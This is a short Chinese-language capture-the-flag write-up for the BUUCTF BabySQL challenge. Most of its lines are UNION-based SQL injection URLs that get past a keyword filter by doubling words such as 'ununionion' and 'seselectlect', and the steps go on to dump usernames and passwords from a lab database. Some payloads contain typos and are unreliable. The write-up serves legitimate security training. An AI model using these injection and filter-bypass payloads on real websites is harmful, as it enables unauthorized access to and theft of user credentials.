BUUCTF [极客大挑战 2019]BabySQL 1

打开就是个登录框，这道题是注入，那无疑就是user或者password处了

输入数据，

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11'&password=22

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' order by 10#&password=22

order by 判断列数发现order by 被过滤

直接union联合查询，发现union被过滤

双写绕过，

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,2,3%23&password=22

接下来就是常规操作：

查找数据库名 -> 表名   -> 列名 -> 数据
11' ununionion seselectlect 1,2,database()%23&password=22
11' ununionion seselectlect 1,(select group_concat(table_name) from information_shcema.tables where table_schema=database()),3%23&password=22
11' ununionion seselectlect 1,(select group_concat(column_name) from information_shcema.columns where table_name='表名'),3%23&password=22
11' ununionion seselectlect 1,(select group_concat(列名) from 表名 ),3%23&password=22

但是发现对or\where\select也做了过滤

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables where table_schema='geek'),database()%23&password=22

继续双写绕过

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'),database()%23&password=22

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'),database()%23&password=22

http://f079249e-ead1-4830-9a2c-dad8ed2f601d.node3.buuoj.cn/check.php?username=11' ununionion seselectlect 1,(seselectlect group_concat(id,username,passwoorrd) frofromm b4bsql),database()%23&password=22